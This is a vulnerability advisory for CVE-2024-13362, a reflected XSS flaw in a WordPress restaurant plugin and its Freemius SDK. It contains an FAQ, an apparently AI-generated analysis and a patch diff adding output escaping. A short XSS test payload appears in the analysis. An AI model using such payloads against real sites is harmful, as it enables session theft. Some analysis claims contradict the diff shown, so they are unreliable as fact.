What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK and the Restaurant Cafe Addon for Elementor plugin. It allows unauthenticated attackers to inject malicious scripts via crafted URL parameters due to insufficient input sanitization.

Who is affected by this vulnerability?

Any WordPress site using the Restaurant Cafe Addon for Elementor plugin version 1.5.8 or earlier is affected. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Restaurant Cafe Addon for Elementor plugin. If it is version 1.5.8 or earlier, your site is at risk. Additionally, review your site’s code for the presence of the vulnerable input handling.

How can I fix or mitigate this issue?

To fix this vulnerability, update the Restaurant Cafe Addon for Elementor plugin to version 1.6.1 or later, which includes the necessary patches. Additionally, ensure that all user input is properly sanitized and escaped in your code.

What does the CVSS score of 6.1 indicate?

The CVSS score of 6.1 indicates a medium severity level for this vulnerability. This means it requires user interaction to exploit, but the potential impact can still be significant if a user is tricked into clicking a malicious link.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can craft a URL that exploits the vulnerability by injecting a malicious script into a data attribute. This script executes when a user visits the vulnerable page, demonstrating the risk of XSS attacks.

What are the potential risks of this vulnerability?

Successful exploitation of this vulnerability can lead to session hijacking, phishing attacks, or defacement of the site. Attackers can execute arbitrary JavaScript in the context of the user’s browser, which can compromise sensitive information.

What is reflected XSS?

Reflected XSS occurs when an attacker injects a script into a URL that is then reflected off a web server. This type of attack requires the victim to click on a malicious link, making it dependent on social engineering.

What measures can I take to prevent future vulnerabilities?

To prevent future vulnerabilities, regularly update all plugins and themes, implement security best practices such as input validation and output escaping, and conduct regular security audits of your WordPress site.

How does this vulnerability relate to the Freemius SDK?

The vulnerability is tied to the Freemius SDK in that it improperly handles user input through URL parameters. This allows for the injection of scripts into the page, particularly in widgets that utilize the SDK.

Is this vulnerability easy to exploit?

While the exploitation requires user interaction, the lack of authentication makes it easier for attackers to target users. Crafting a malicious URL is straightforward, which increases the risk of successful exploitation.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the affected plugin until it can be updated. Additionally, educate users about the risks of clicking on unknown links and monitor site traffic for suspicious activity.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (restaurant-cafe-addon-for-elementor)

CVE ID CVE-2024-13362

Plugin restaurant-cafe-addon-for-elementor

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.5.8

Patched Version 1.6.1

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362:

This is a reflected DOM-based Cross-Site Scripting vulnerability found in the Freemius SDK library (versions up to 2.10.1) and the Restaurant Cafe Addon for Elementor plugin. The vulnerability arises from insufficient input sanitization and output escaping across multiple widget files, allowing unauthenticated attackers to inject malicious scripts via crafted URL parameters. The CVSS score of 6.1 indicates medium severity due to the requirement for user interaction (clicking a link), but the lack of authentication makes it broadly exploitable.

The root cause is the absence of esc_attr() or esc_html() on user-controllable values before they are rendered into HTML attributes or inline scripts. In the nabasic-image-compare.php file (line 295), the $compare_style variable is echoed directly into a data attribute without escaping: ‘data-compare-style=””‘. More critically, the nabasic-testimonials.php file previously embedded raw JavaScript that read data attributes from the DOM and passed them into an OwlCarousel initialization without sanitization. The code diff shows multiple files (nabasic-about-us.php, nabasic-blog.php, nabasic-gallery.php, nabasic-process.php, nabasic-section-title.php, nabasic-separator.php, nabasic-services.php, nabasic-video.php) where variables like $btn_icon, $blog_show_id, $filter_cat, $step_title, $section_title, and $border_class are now wrapped in esc_attr() or esc_html() calls.

Exploitation requires an attacker to craft a URL containing a malicious payload in a parameter that flows into one of the vulnerable widgets. For example, if a shortcode like [narestaurant_elementor_template] exposes Elementor content and an attacker controls the $compare_style parameter via a query string, they can inject a JavaScript payload like “>alert(1). The attacker must trick an authenticated user (or at least a user visiting the frontend) into clicking the crafted link. The most direct vector is through the Freemius SDK’s handling of the ‘url’ parameter, which could be passed to a widget’s rendering function without proper escaping.

The patch introduces output escaping functions (esc_attr(), esc_html(), wp_kses_post()) on all variables that were previously concatenated directly into HTML strings. In the nabasic-image-compare.php file, the entire inline script block was replaced with data attributes that are individually escaped. The nabasic-testimonials.php file removes the inline JavaScript entirely, shifting initialization to a separate JavaScript file that reads properly escaped data attributes. The narestaurant_insert_elementor() function adds permission checks: unauthenticated users can only see published posts, and logged-in users must have read capability; post IDs are sanitized with absint().

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim’s browser session. This can lead to session hijacking (theft of WordPress authentication cookies), defacement of the rendered page, phishing attacks by overlaying fake login forms, or exfiltration of sensitive data displayed on the page. Because the XSS is reflected (not stored), the attack requires social engineering but can be chained with other vulnerabilities for greater impact.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/restaurant-cafe-addon-for-elementor/elementor/lib/lib.php
+++ b/restaurant-cafe-addon-for-elementor/elementor/lib/lib.php
@@ -10,19 +10,69 @@
 }

 if ( ! function_exists( 'narestaurant_insert_elementor' ) ) {
-	function narestaurant_insert_elementor($atts){
-	  if (!class_exists('ElementorPlugin')){
-	      return '';
-	  }
-	  if (!isset($atts['id']) || empty($atts['id'])){
-	      return '';
-	  }
-
-	  $post_id = $atts['id'];
-	  $response = Plugin::instance()->frontend->get_builder_content_for_display($post_id);
-	  return $response;
-	}
-	add_shortcode('narestaurant_elementor_template','Elementornarestaurant_insert_elementor');
+    function narestaurant_insert_elementor($atts) {
+        // Check if Elementor exists
+        if (!class_exists('ElementorPlugin')) {
+            return '';
+        }
+
+        // Validate shortcode attributes
+        if (!isset($atts['id']) || empty($atts['id'])) {
+            return '';
+        }
+
+        $post_id = absint($atts['id']); // Sanitize the ID
+
+        // Get the post
+        $post = get_post($post_id);
+        if (!$post) {
+            return '';
+        }
+
+        // Security checks
+        if (!is_user_logged_in()) {
+            // For non-logged in users, only show published posts
+            if ($post->post_status !== 'publish') {
+                return '';
+            }
+        } else {
+            // For logged-in users, check proper permissions
+            if (!current_user_can('read_post', $post_id)) {
+                return '';
+            }
+
+            // Additional status checks
+            $allowed_statuses = array('publish');
+
+            // Allow draft/private viewing only for editors and admins
+            if (current_user_can('edit_posts')) {
+                $allowed_statuses[] = 'draft';
+                $allowed_statuses[] = 'private';
+            }
+
+            if (!in_array($post->post_status, $allowed_statuses)) {
+                return '';
+            }
+        }
+
+        // Verify post type supports Elementor
+        if (!current_theme_supports('elementor') &&
+            !in_array($post->post_type, get_post_types_by_support('elementor'))) {
+            return '';
+        }
+
+        // Get Elementor content with proper error handling
+        try {
+            $response = Plugin::instance()->frontend->get_builder_content_for_display($post_id);
+            return $response;
+        } catch (Exception $e) {
+            if (current_user_can('manage_options')) {
+                return sprintf('Elementor error: %s', esc_html($e->getMessage()));
+            }
+            return '';
+        }
+    }
+    add_shortcode('narestaurant_elementor_template', 'narestaurant_insert_elementor');
 }

 if ( !class_exists('NAREP_Controls_Helper_Output') ){
--- a/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-about-us.php
+++ b/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-about-us.php
@@ -783,7 +783,7 @@
 		$aboutus_btn_link_nofollow = !empty( $settings['aboutus_btn_link']['nofollow'] ) ? 'rel="nofollow"' : '';
 		$aboutus_btn_link_attr = !empty( $aboutus_btn_link ) ?  $aboutus_btn_link_external.' '.$aboutus_btn_link_nofollow : '';
 		$btn_icon = !empty( $settings['btn_icon'] ) ? $settings['btn_icon'] : '';
-  	$btn_icon = $btn_icon ? ' <i class="'.esc_attr($btn_icon).'"></i>' : '';
+  		$btn_icon = $btn_icon ? ' <i class="'.esc_attr($btn_icon).'"></i>' : '';
 		$listItems_groups = !empty( $settings['listItems_groups'] ) ? $settings['listItems_groups'] : '';
 		$toggle_align = !empty( $settings['toggle_align'] ) ? $settings['toggle_align'] : '';
 		$aboutus_sign_image = !empty( $settings['aboutus_sign_image']['id'] ) ? $settings['aboutus_sign_image']['id'] : '';
--- a/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-blog.php
+++ b/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-blog.php
@@ -1345,26 +1345,26 @@
 			$pageDots = !empty( $settings['pageDots'] ) ? $settings['pageDots'] : '';

 		// Carousel Data's
-			$draggable = $draggable ? ' data-draggable="true"' : ' data-draggable="false"';
-			$freeScroll = $freeScroll ? ' data-freescroll="true"' : '';
-			$freeScrollFriction = $freeScrollFriction ? ' data-freescrollfriction="'.$freeScrollFriction.'"' : '';
-			$wrapAround = $wrapAround ? ' data-wraparound="true"' : ' data-wraparound="false"';
-			$groupCells = $groupCells ? ' data-groupcells="'.$groupCells.'"' : '';
-			$autoPlay = $autoPlay ? ' data-autoplay="'.$autoPlay.'"' : '';
-			$pauseAutoPlayOnHover = $pauseAutoPlayOnHover ? ' data-pauseautoplayonhover="true"' : '';
-			$adaptiveHeight = $adaptiveHeight ? ' data-adaptiveheight="true"' : '';
-			$dragThreshold = $dragThreshold ? ' data-dragthreshold="'.$dragThreshold.'"' : '';
-			$selectedAttraction = $selectedAttraction ? ' data-selectedattraction="'.$selectedAttraction.'"' : '';
-			$friction = $friction ? ' data-friction="'.$friction : '';
-			$initialIndex = $initialIndex ? ' data-initialindex="'.$initialIndex.'"' : '';
-			$accessibility = $accessibility ? ' data-accessibility="true"' : ' data-accessibility="false"';
-			$setGallerySize = $setGallerySize ? ' data-setgallerysize="true"' : ' data-setgallerysize="false"';
-			$resize = $resize ? ' data-resize="true"' : ' data-resize="false"';
-			$cellAlign = $cellAlign ? ' data-cellalign="'.$cellAlign.'"' : '';
-			$contain = $contain ? ' data-contain="true"' : '';
-			$rightToLeft = $rightToLeft ? ' data-righttoleft="true"' : '';
-			$prevNextButtons = $prevNextButtons ? ' data-prevnextbuttons="true"' : ' data-prevnextbuttons="false"';
-			$pageDots = $pageDots ? ' data-pagedots="true"' : ' data-pagedots="false"';
+			$draggable = $draggable ? 'true' : 'false';
+			$freeScroll = $freeScroll ? 'true' : '';
+			$freeScrollFriction = $freeScrollFriction ? $freeScrollFriction: '';
+			$wrapAround = $wrapAround ? 'true' : 'false';
+			$groupCells = $groupCells ? $groupCells : '';
+			$autoPlay = $autoPlay ? $autoPlay : '';
+			$pauseAutoPlayOnHover = $pauseAutoPlayOnHover ? 'true' : '';
+			$adaptiveHeight = $adaptiveHeight ? 'true' : '';
+			$dragThreshold = $dragThreshold ? $dragThreshold : '';
+			$selectedAttraction = $selectedAttraction ? $selectedAttraction : '';
+			$friction = $friction ? $friction : '';
+			$initialIndex = $initialIndex ? $initialIndex : '';
+			$accessibility = $accessibility ? 'true' : 'false';
+			$setGallerySize = $setGallerySize ? 'true' : 'false';
+			$resize = $resize ? 'true' : 'false';
+			$cellAlign = $cellAlign ? $cellAlign : '';
+			$contain = $contain ? 'true' : '';
+			$rightToLeft = $rightToLeft ? 'true' : '';
+			$prevNextButtons = $prevNextButtons ? 'true' : 'false';
+			$pageDots = $pageDots ? 'true' : 'false';

 		$blog_col = $blog_col ? $blog_col : '3';

@@ -1407,9 +1407,9 @@
 			$blog_show_id = json_encode( $blog_show_id );
 			$blog_show_id = str_replace(array( '[', ']' ), '', $blog_show_id);
 			$blog_show_id = str_replace(array( '"', '"' ), '', $blog_show_id);
-      $blog_show_id = explode(',',$blog_show_id);
+      		$blog_show_id = explode(',',$blog_show_id);
     } else {
-      $blog_show_id = '';
+      		$blog_show_id = '';
     }

 		$args = array(
@@ -1420,14 +1420,35 @@
 		  'category_name' => implode(',', $blog_show_category),
 		  'orderby' => $blog_orderby,
 		  'order' => $blog_order,
-      'post__in' => $blog_show_id,
+      		'post__in' => $blog_show_id,
 		);

 		$narestaurant_post = new WP_Query( $args );
 		if ($narestaurant_post->have_posts()) : ?>
 		<div class="narep-blog-wrap<?php echo esc_attr($style_class); ?>">
 			<?php if ($blog_style === 'three') { ?>
-			<div class="flick-carousel" <?php echo $cellAlign . $draggable . $freeScroll . $freeScrollFriction . $wrapAround . $groupCells . $autoPlay . $pauseAutoPlayOnHover . $adaptiveHeight . $dragThreshold . $selectedAttraction . $friction . $initialIndex . $accessibility . $setGallerySize . $resize . $contain . $rightToLeft . $prevNextButtons . $pageDots; ?>>
+				<div class="flick-carousel"
+				    <?php if ($cellAlign) : ?>data-cellalign="<?php echo esc_attr($cellAlign); ?>"<?php endif; ?>
+				    data-draggable="<?php echo esc_attr($draggable); ?>"
+				    <?php if ($freeScroll) : ?>data-freescroll="<?php echo esc_attr($freeScroll); ?>"<?php endif; ?>
+				    <?php if ($freeScrollFriction) : ?>data-freescrollfriction="<?php echo esc_attr($freeScrollFriction); ?>"<?php endif; ?>
+				    data-wraparound="<?php echo esc_attr($wrapAround); ?>"
+				    <?php if ($groupCells) : ?>data-groupcells="<?php echo esc_attr($groupCells); ?>"<?php endif; ?>
+				    <?php if ($autoPlay) : ?>data-autoplay="<?php echo esc_attr($autoPlay); ?>"<?php endif; ?>
+				    <?php if ($pauseAutoPlayOnHover) : ?>data-pauseautoplayonhover="<?php echo esc_attr($pauseAutoPlayOnHover); ?>"<?php endif; ?>
+				    <?php if ($adaptiveHeight) : ?>data-adaptiveheight="<?php echo esc_attr($adaptiveHeight); ?>"<?php endif; ?>
+				    <?php if ($dragThreshold) : ?>data-dragthreshold="<?php echo esc_attr($dragThreshold); ?>"<?php endif; ?>
+				    <?php if ($selectedAttraction) : ?>data-selectedattraction="<?php echo esc_attr($selectedAttraction); ?>"<?php endif; ?>
+				    <?php if ($friction) : ?>data-friction="<?php echo esc_attr($friction); ?>"<?php endif; ?>
+				    <?php if ($initialIndex) : ?>data-initialindex="<?php echo esc_attr($initialIndex); ?>"<?php endif; ?>
+				    data-accessibility="<?php echo esc_attr($accessibility); ?>"
+				    data-setgallerysize="<?php echo esc_attr($setGallerySize); ?>"
+				    data-resize="<?php echo esc_attr($resize); ?>"
+				    <?php if ($contain) : ?>data-contain="<?php echo esc_attr($contain); ?>"<?php endif; ?>
+				    <?php if ($rightToLeft) : ?>data-righttoleft="<?php echo esc_attr($rightToLeft); ?>"<?php endif; ?>
+				    data-prevnextbuttons="<?php echo esc_attr($prevNextButtons); ?>"
+				    data-pagedots="<?php echo esc_attr($pageDots); ?>"
+				>
 			<?php } else { ?>
 			<div class="nich-row">
 			<?php } ?>
@@ -1435,8 +1456,8 @@
 			<?php while ($narestaurant_post->have_posts()) : $narestaurant_post->the_post();

 			global $post;
-		  $large_image =  wp_get_attachment_image_src( get_post_thumbnail_id(get_the_ID()), 'fullsize', false, '' );
-		  $large_image = $large_image[0];
+		  	$large_image =  wp_get_attachment_image_src( get_post_thumbnail_id(get_the_ID()), 'fullsize', false, '' );
+		  	$large_image = $large_image[0];
 			$cat_list = get_the_category();

 		  if ($large_image && $blog_image) {
--- a/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-gallery.php
+++ b/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-gallery.php
@@ -978,15 +978,15 @@

 				$link_image = $image_link ? '<a href="'.esc_url($image_link).'" '.$image_link_attr.'><img src="'.esc_url($image_url).'" alt="'.esc_attr($gallery_title).'"></a>' : '<img src="'.esc_url($image_url).'" alt="'.esc_attr($gallery_title).'">';

-				$max_height = $height ? ' style="max-height: '.$height.$unit.';"' : '';
+				$max_height = $height ? ' style="max-height: '.esc_attr($height).esc_attr($unit).';"' : '';

 				$image = $image_url ? '<div class="narep-image'.esc_attr($popup_class).'"'.$max_height.'>'.$link_image.$icon_popup.'</div>' : '';

-				$category = $filter_cat ? ' data-category="'. str_replace(', ', " ", strtolower($filter_cat)) .'"' : '';
+				$category = $filter_cat ? ' data-category="'. str_replace(', ', " ", strtolower(esc_attr($filter_cat))) .'"' : '';
 				$category_class = $filter_cat ? ' '.str_replace(', ', " ", strtolower($filter_cat)) : '';

-			  $output .= '<div class="masonry-item'.$category_class.' '.$gallery_col.'"'.$category.'>
-			  							<div class="narep-gallery-item'.$hover_class.$style_class.'">';
+			  $output .= '<div class="masonry-item'.esc_attr($category_class.' '.$gallery_col).'"'.$category.'>
+			  							<div class="narep-gallery-item'.esc_attr($hover_class.$style_class).'">';
 			  							if ($gallery_style === 'two') {$output .= '<div class="gallery-info-wrap">';}
 		  									$output .= $image.'
 			  								<div class="gallery-info">'.$title.$subtitle.'</div>';
--- a/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-history.php
+++ b/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-history.php
@@ -892,7 +892,7 @@
 				if ($history_style === 'vertical') {
 					$output .= '<div class="narep-history-item"><div class="history-info'.esc_attr($height_class).'"><span></span>'.$title.$content.$button.'</div><div class="history-image"><div class="history-image-wrap">'.$year.$history_image.'</div></div></div>';
 				} else {
-			  	$output .= '<div class="narep-history-item"><div class="history-info'.esc_attr($height_class).'"><span></span>'.$year.$title.$content.$button.'</div><div class="history-image">'.$history_image.'</div></div>';
+			  		$output .= '<div class="narep-history-item"><div class="history-info'.esc_attr($height_class).'"><span></span>'.$year.$title.$content.$button.'</div><div class="history-image">'.$history_image.'</div></div>';
 				}

 			}
--- a/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-image-compare.php
+++ b/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-image-compare.php
@@ -267,59 +267,37 @@
 	 * Written in PHP and used to generate the final HTML.
 	*/
 	protected function render() {
-		$settings = $this->get_settings_for_display();
-		$compare_style = !empty( $settings['compare_style'] ) ? $settings['compare_style'] : [];
-		$starting_position = !empty( $settings['starting_position'] ) ? $settings['starting_position'] : [];
-		$need_title = !empty( $settings['need_title'] ) ? $settings['need_title'] : [];
-
-		if ($need_title) {
-			$title = 'true';
-		} else {
-			$title = 'false';
-		}
-
-		$before_image = !empty( $settings['before_image']['id'] ) ? $settings['before_image']['id'] : '';
-		$before_url = wp_get_attachment_url( $before_image );
-		$before_title = $settings['before_title'] ? $settings['before_title'] : '';
-
-		$after_image = !empty( $settings['after_image']['id'] ) ? $settings['after_image']['id'] : '';
-		$after_url = wp_get_attachment_url( $after_image );
-		$after_title = $settings['after_title'] ? $settings['after_title'] : '';
-
-		$compare_id = uniqid();
-		$id = rand(999, 9999);
-
-	  $output = '<div class="narep-compare-wrap"><div class="narep-compare compare-'.esc_attr($compare_id).'-'.esc_attr($id).'"></div></div>';
-
-		echo $output; ?>
-
-		<script type="text/javascript">
-
-	    jQuery(document).ready(function($) {
-
-	    	slider = new juxtapose.JXSlider('.compare-<?php echo esc_attr($compare_id); ?>-<?php echo esc_attr($id); ?>',
-		    [
-	        {
-            src: '<?php echo esc_url($before_url); ?>',
-            label: '<?php echo esc_attr($before_title); ?>',
-	        },
-	        {
-            src: '<?php echo esc_url($after_url); ?>',
-            label: '<?php echo esc_attr($after_title); ?>',
-	        }
-		    ],
-		    {
-	        animate: true,
-	        showLabels: <?php echo esc_attr($title); ?>,
-	        showCredits: false,
-	        startingPosition: "<?php echo esc_attr($starting_position); ?>%",
-	        makeResponsive: true,
-	        mode: "<?php echo esc_attr($compare_style); ?>",
-		    });
-
-	    });
-	  </script>
-	<?php
+	    $settings = $this->get_settings_for_display();
+	    $compare_style = !empty($settings['compare_style']) ? $settings['compare_style'] : '';
+	    $starting_position = !empty($settings['starting_position']) ? $settings['starting_position'] : '';
+	    $need_title = !empty($settings['need_title']) ? $settings['need_title'] : '';
+	    $title = $need_title ? 'true' : 'false';
+
+	    $before_image = !empty($settings['before_image']['id']) ? $settings['before_image']['id'] : '';
+	    $before_url = wp_get_attachment_url($before_image);
+	    $before_title = $settings['before_title'] ? $settings['before_title'] : '';
+
+	    $after_image = !empty($settings['after_image']['id']) ? $settings['after_image']['id'] : '';
+	    $after_url = wp_get_attachment_url($after_image);
+	    $after_title = $settings['after_title'] ? $settings['after_title'] : '';
+
+	    $compare_id = uniqid();
+	    $id = rand(999, 9999);
+	    $unique_class = 'compare-' . esc_attr($compare_id) . '-' . esc_attr($id);
+	    ?>
+
+	    <div class="narep-compare-wrap">
+	        <div class="narep-compare <?php echo esc_attr($unique_class); ?>"
+	            data-before-url="<?php echo esc_url($before_url); ?>"
+	            data-before-title="<?php echo esc_attr($before_title); ?>"
+	            data-after-url="<?php echo esc_url($after_url); ?>"
+	            data-after-title="<?php echo esc_attr($after_title); ?>"
+	            data-show-labels="<?php echo esc_attr($title); ?>"
+	            data-starting-position="<?php echo esc_attr($starting_position); ?>"
+	            data-compare-style="<?php echo esc_attr($compare_style); ?>">
+	        </div>
+	    </div>
+	    <?php
 	}

 }
--- a/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-process.php
+++ b/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-process.php
@@ -894,7 +894,7 @@

 	 			  $title_link = !empty( $title_link ) ? '<a href="'.esc_url($title_link).'" '.$title_link_attr.'>'.esc_html($process_title).'</a>' : esc_html($process_title);
 			  	$title = !empty( $process_title ) ? '<h4 class="process-title">'.$title_link.'</h4>' : '';
-			  	$step_title = !empty( $step_title ) ? '<div class="narep-step-counter">'.$step_title.'</div>' : '';
+			  	$step_title = !empty( $step_title ) ? '<div class="narep-step-counter">'.esc_attr( $step_title ).'</div>' : '';
 					$content = $process_content ? '<p>'.esc_html($process_content).'</p>' : '';

 				  $output .= '<div class="narep-process-item">
--- a/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-section-title.php
+++ b/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-section-title.php
@@ -334,8 +334,8 @@
 		$title_image = !empty( $settings['title_image']['id'] ) ? $settings['title_image']['id'] : '';
 		$title_image_url = wp_get_attachment_url( $title_image );

-		$section_title = $section_title ? '<h3>'.$section_title.'</h3>' : '';
-		$section_sub_title = $section_sub_title ? '<h4>'.$section_sub_title.'</h4>' : '';
+		$section_title = $section_title ? '<h3>'.esc_html( $section_title ).'</h3>' : '';
+		$section_sub_title = $section_sub_title ? '<h4>'.esc_html( $section_sub_title ).'</h4>' : '';
 		$title_image = $title_image_url ? '<div class="narep-image"><img src="'.esc_url($title_image_url).'" alt="Icon"></div>' : '';

 		// Turn output buffer on
--- a/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-separator.php
+++ b/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-separator.php
@@ -1010,12 +1010,12 @@
 			$border_rsub_class = 'sep-right';
 		}

-		$output = '<div class="narep-separator'.$align_class.$salign_class.$pos_class.$border_class.'">';
+		$output = '<div class="narep-separator'.esc_attr( $align_class.$salign_class.$pos_class.$border_class ).'">';
 							if ($separator_style === 'two') {
 							} else {
-			          $output .= '<span class="'.$border_lsub_class.'"></span><div class="narep-sep">'.$separator.'</div><span class="'.$border_rsub_class.'"></span>';
+			          $output .= '<span class="'.esc_attr( $border_lsub_class ).'"></span><div class="narep-sep">'.$separator.'</div><span class="'.esc_attr( $border_rsub_class ).'"></span>';
 							}
-    $output .= '</div>';
+    	$output .= '</div>';

 		echo $output;

--- a/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-services.php
+++ b/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-services.php
@@ -844,9 +844,9 @@
 			}
 	  }
 	  if($service_style === 'three') {
-			$output = '<div class="narep-service-item service-style-three'.$salign_class.'">'.$serv_image.'<div class="service-info"><div class="service-info-inner">'.$icon_main.$title.$content.'</div></div></div>';
+			$output = '<div class="narep-service-item service-style-three'.esc_attr( $salign_class ).'">'.$serv_image.'<div class="service-info"><div class="service-info-inner">'.$icon_main.$title.$content.'</div></div></div>';
 		} else {
-			$output = '<div class="narep-service-item'.$service_style_cls.$style_cls.$hover_cls.$border_cls.$salign_class.$img_class.$bg_cls.'">'.$icon_main.'<div class="service-info">'.$title.$content.$button.'</div></div>';
+			$output = '<div class="narep-service-item'.esc_attr($service_style_cls.$style_cls.$hover_cls.$border_cls.$salign_class.$img_class.$bg_cls).'">'.$icon_main.'<div class="service-info">'.$title.$content.$button.'</div></div>';
 		}
 		echo $output;

--- a/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-testimonials.php
+++ b/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-testimonials.php
@@ -1209,64 +1209,7 @@
 		$output .= '</div>';
 		if ($testimonial_style === 'two') { $output .= '</div>'; }
 		$output .= '</div>';
-		if ( Plugin::$instance->editor->is_edit_mode() ) : ?>
-		<script type="text/javascript">
-	    jQuery(document).ready(function($) {
-				$('.owl-carousel').each( function() {
-			    var $carousel = $(this);
-			    var $items = ($carousel.data('items') !== undefined) ? $carousel.data('items') : 1;
-			    var $items_tablet = ($carousel.data('items-tablet') !== undefined) ? $carousel.data('items-tablet') : 1;
-			    var $items_mobile_landscape = ($carousel.data('items-mobile-landscape') !== undefined) ? $carousel.data('items-mobile-landscape') : 1;
-			    var $items_mobile_portrait = ($carousel.data('items-mobile-portrait') !== undefined) ? $carousel.data('items-mobile-portrait') : 1;
-			    $carousel.owlCarousel ({
-			      loop : ($carousel.data('loop') !== undefined) ? $carousel.data('loop') : true,
-			      items : $carousel.data('items'),
-			      margin : ($carousel.data('margin') !== undefined) ? $carousel.data('margin') : 0,
-			      dots : ($carousel.data('dots') !== undefined) ? $carousel.data('dots') : true,
-			      nav : ($carousel.data('nav') !== undefined) ? $carousel.data('nav') : false,
-			      navText : ["<div class='slider-no-current'><span class='current-no'></span><span class='total-no'></span></div><span class='current-monials'></span>", "<div class='slider-no-next'></div><span class='next-monials'></span>"],
-			      autoplay : ($carousel.data('autoplay') !== undefined) ? $carousel.data('autoplay') : false,
-			      autoplayTimeout : ($carousel.data('autoplay-timeout') !== undefined) ? $carousel.data('autoplay-timeout') : 5000,
-			      animateIn : ($carousel.data('animatein') !== undefined) ? $carousel.data('animatein') : false,
-			      animateOut : ($carousel.data('animateout') !== undefined) ? $carousel.data('animateout') : false,
-			      mouseDrag : ($carousel.data('mouse-drag') !== undefined) ? $carousel.data('mouse-drag') : true,
-			      autoWidth : ($carousel.data('auto-width') !== undefined) ? $carousel.data('auto-width') : false,
-			      autoHeight : ($carousel.data('auto-height') !== undefined) ? $carousel.data('auto-height') : false,
-			      center : ($carousel.data('center') !== undefined) ? $carousel.data('center') : false,
-			      responsiveClass: true,
-			      dotsEachNumber: true,
-			      smartSpeed: 600,
-			      autoplayHoverPause: true,
-			      responsive : {
-			        0 : {
-			          items : $items_mobile_portrait,
-			        },
-			        480 : {
-			          items : $items_mobile_landscape,
-			        },
-			        768 : {
-			          items : $items_tablet,
-			        },
-			        992 : {
-			          items : $items,
-			        }
-			      }
-			    });
-			    var totLength = $('.owl-dot', $carousel).length;
-			    $('.total-no', $carousel).html(totLength);
-			    $('.current-no', $carousel).html(totLength);
-			    $carousel.owlCarousel();
-			    $('.current-no', $carousel).html(1);
-			    $carousel.on('changed.owl.carousel', function(event) {
-			      var total_items = event.page.count;
-			      var currentNum = event.page.index + 1;
-			      $('.total-no', $carousel ).html(total_items);
-			      $('.current-no', $carousel).html(currentNum);
-			    });
-			  });
-		  });
-		</script>
-		<?php endif;
+
 		echo $output;

 	}
--- a/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-video.php
+++ b/restaurant-cafe-addon-for-elementor/elementor/widgets/basic/nabasic-video.php
@@ -895,14 +895,14 @@
 		}

 		if ($need_title) {
-			$video = $video_link ? '<a href="'.esc_url($video_link).'" class="narep-popup-video"><span class="narep-video-btn-wrap"><span class="narep-video-btn"><i class="fa fa-play" aria-hidden="true"></i>'.$animation.'</span>'.$title.'</span></a>' : '';
+			$video = $video_link ? '<a href="'.esc_url($video_link).'" class="narep-popup-video"><span class="narep-video-btn-wrap"><span class="narep-video-btn"><i class="fa fa-play" aria-hidden="true"></i>'.wp_kses_post( $animation ).'</span>'.$title.'</span></a>' : '';
 		} else {
-			$video = $video_link ? '<a href="'.esc_url($video_link).'" class="narep-video-btn narep-popup-video"><i class="fa fa-play" aria-hidden="true"></i>'.$animation.'</a>' : '';
+			$video = $video_link ? '<a href="'.esc_url($video_link).'" class="narep-video-btn narep-popup-video"><i class="fa fa-play" aria-hidden="true"></i>'.wp_kses_post( $animation ).'</a>' : '';
 		}
 		$title_image_url = wp_get_attachment_url( $title_image );
-		$section_title = $section_title ? '<h3>'.$section_title.'</h3>' : '';
-		$section_sub_title = $section_sub_title ? '<h4>'.$section_sub_title.'</h4>' : '';
-		$content = $content ? $content : '';
+		$section_title = $section_title ? '<h3>'.wp_kses_post($section_title).'</h3>' : '';
+		$section_sub_title = $section_sub_title ? '<h4>'.wp_kses_post($section_sub_title).'</h4>' : '';
+		$content = $content ? wp_kses_post($content) : '';
 		$title_image = $title_image_url ? '<div class="narep-image"><img src="'.esc_url($title_image_url).'" alt="Icon"></div>' : '';
 		$sign_image_url = wp_get_attachment_url( $sign_image );
 		$sign_image = $sign_image_url ? '<div class="sign-image"><img src="'.esc_url($sign_image_url).'" alt="Icon"></div>' : '';
--- a/restaurant-cafe-addon-for-elementor/freemius/includes/class-freemius.php
+++ b/restaurant-cafe-addon-for-elementor/freemius/includes/class-freemius.php
@@ -110,6 +110,12 @@
         private $_enable_anonymous = true;

         /**
+         * @since 2.9.1
+         * @var string|null Hints the SDK whether the plugin supports parallel activation mode, preventing the auto-deactivation of the free version when the premium version is activated, and vice versa.
+         */
+        private $_premium_plugin_basename_from_parallel_activation;
+
+        /**
          * @since 1.1.7.5
          * @var bool Hints the SDK if plugin should run in anonymous mode (only adds feedback form).
          */
@@ -1651,6 +1657,31 @@
                     );
                 }
             }
+
+            if (
